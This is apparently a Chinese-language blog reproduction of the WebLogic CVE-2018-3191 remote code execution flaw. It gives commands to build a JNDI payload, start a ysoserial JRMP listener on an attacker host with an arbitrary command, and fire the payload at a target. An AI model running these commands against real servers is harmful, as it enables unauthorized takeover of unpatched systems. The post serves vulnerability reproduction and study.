0x00 weblogic漏洞简介

北京时间10月17日,Oracle官方发布的10月关键补丁更新CPU(Critical Patch Update)中修复了一个高危的WebLogic远程代码执行漏洞(CVE-2018-3191)。该漏洞允许未经身份验证的攻击者通过T3协议网络访问并破坏易受攻击的WebLogic Server,成功的漏洞利用可导致WebLogic Server被攻击者接管,从而造成远程代码执行。这个漏洞由Matthias Kaiser,loopx9,Li Zhengdong申报。

0x01复现准备

首先准备payload

java -jar weblogic-spring-jndi.jar rmi://攻击端ip:端口/Exp > payload.txt

CVE-2018-3191远程代码命令执行漏洞

然后搭建rmi服务器端

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 端口 CommonsCollections1 "要执行的指令"

CVE-2018-3191远程代码命令执行漏洞

0x02 复现

Python weblogic.py target_ip target_port payload.txt

CVE-2018-3191远程代码命令执行漏洞

此时rmi服务器那边能看到有连接

CVE-2018-3191远程代码命令执行漏洞

0x03 验证结果

此时可以看到1.txt写入了

CVE-2018-3191远程代码命令执行漏洞

相关文章:

  • 2021-07-31
  • 2021-06-28
  • 2021-11-28
  • 2021-01-21
  • 2021-12-21
  • 2021-05-11
  • 2021-09-04
  • 2021-05-29
猜你喜欢
  • 2022-01-10
  • 2021-07-15
  • 2020-06-19
  • 2022-01-06
  • 2022-01-22
  • 2021-04-24
  • 2021-07-13
相关资源
相似解决方案